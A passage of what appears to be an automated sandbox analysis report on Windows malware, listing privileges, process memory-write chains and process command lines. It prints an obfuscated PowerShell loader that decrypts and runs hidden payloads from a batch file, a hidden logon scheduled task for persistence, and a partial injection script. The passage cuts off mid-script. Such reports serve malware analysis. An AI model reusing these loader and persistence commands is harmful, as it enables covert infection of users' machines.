Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 400 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 3816 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\cmd.exe
PID 400 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 400 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 400 wrote to memory of 3572 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3572 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3572 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3572 wrote to memory of 4276 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3572 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 3572 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 3572 wrote to memory of 2572 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WScript.exe
PID 2572 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2572 wrote to memory of 2444 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 4516 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2444 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2444 wrote to memory of 2668 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2668 wrote to memory of 1796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 2668 wrote to memory of 1796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 2668 wrote to memory of 1796 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Local\Temp\Install.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 3300 wrote to memory of 2560 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE C:\Windows\System32\dllhost.exe
PID 2560 wrote to memory of 644 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\winlogon.exe
PID 2560 wrote to memory of 696 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\lsass.exe
PID 2560 wrote to memory of 1000 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 468 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\dwm.exe
PID 2560 wrote to memory of 788 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 716 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1064 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1120 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1128 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1236 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1244 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1320 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1408 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1488 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1512 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1588 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1596 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1676 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1732 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1760 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1856 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1868 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 1224 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 1300 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 432 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 2064 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 2168 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\spoolsv.exe
PID 2560 wrote to memory of 2280 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 2308 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\svchost.exe
PID 2560 wrote to memory of 2536 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\sihost.exe
PID 2560 wrote to memory of 2552 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 2600 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe
PID 2560 wrote to memory of 2612 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\svchost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s nsi

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation

C:\Windows\system32\sihost.exe

sihost.exe

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k NetworkService -p

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

C:\Windows\system32\SppExtComObj.exe

C:\Windows\system32\SppExtComObj.exe -Embedding

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'Windows_Log_226_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Windows_Log_226.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\sysWOW64\wbem\wmiprvse.exe

C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows_Log_226.vbs"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows_Log_226.bat" "

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('9ZSSIVseT17UszvdY4C5NHz76P6SG2gulfr28Vowtr0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iKcHjGMUp8jMw93DJpJszA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $dvDwv=New-Object System.IO.MemoryStream(,$param_var); $bxxfa=New-Object System.IO.MemoryStream; $TRmaY=New-Object System.IO.Compression.GZipStream($dvDwv, [IO.Compression.CompressionMode]::Decompress); $TRmaY.CopyTo($bxxfa); $TRmaY.Dispose(); $dvDwv.Dispose(); $bxxfa.Dispose(); $bxxfa.ToArray();}function execute_function($param_var,$param2_var){ $NYMID=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tqTZr=$NYMID.EntryPoint; $tqTZr.Invoke($null, $param2_var);}$lgaaF = 'C:\Users\Admin\AppData\Roaming\Windows_Log_226.bat';$host.UI.RawUI.WindowTitle = $lgaaF;$MAhJa=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($lgaaF).Split([Environment]::NewLine);foreach ($fpybs in $MAhJa) { if ($fpybs.StartsWith('YDeMGzpSIOGZpUFjRNFm')) { $QCmKM=$fpybs.Substring(20); break; }}$payloads_var=[string[]]$QCmKM.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\Install.exe

"C:\Users\Admin\AppData\Local\Temp\Install.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KZyztRCvrUwz{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$rTwozFgrlugeOH,[Parameter(Position=1)][Type]$dvIWWEFouI)$vqcbosjkzxk=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+[Char](102)+''+[Char](108)+''+[Char](101)+''+[Char](99)+'t'+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+'g'+[Char](97)+''+'t'+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+''+'M'+''+'e'+''+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+'o'+'d'+'u'+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+'a'+''+[Char](116)+'eT'+'y'+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+'s'+','+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+','+[Char](83)+''+[Char](101)+'a'+'l'+''+'e'+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+'n'+''+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+'A'+[Char](117)+'t'+[Char](111)+''+'C'+'l'+[Char](97)+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$vqcbosjkzxk.DefineConstructor('R'+[Char](84)+'Spec'+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+[Char](97)+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+'S'+'ig'+[Char](44)+''+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+'c'+'',[Reflection.CallingConventions]::Standard,$rTwozFgrlugeOH).SetImplementationFlags(''+'R'+''+[Char](117)+'nt'+[Char](105)+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+'a'+[Char](103)+'ed');$vqcbosjkzxk.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+'ke',''+'P'+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'By'+'S'+''+'i'+''+'g'+','+[Char](78)+''+[Char](101)+''+[Char](119)+'Slo'+[Char](116)+''+[Char](44)+''+'V'+''+[Char](105)+''+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+'',$dvIWWEFouI,$rTwozFgrlugeOH).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+'m'+''+'e'+''+','+'M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+'d');Write-Output $vqcbosjkzxk.CreateType();}$tozNwEtJLckQR=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 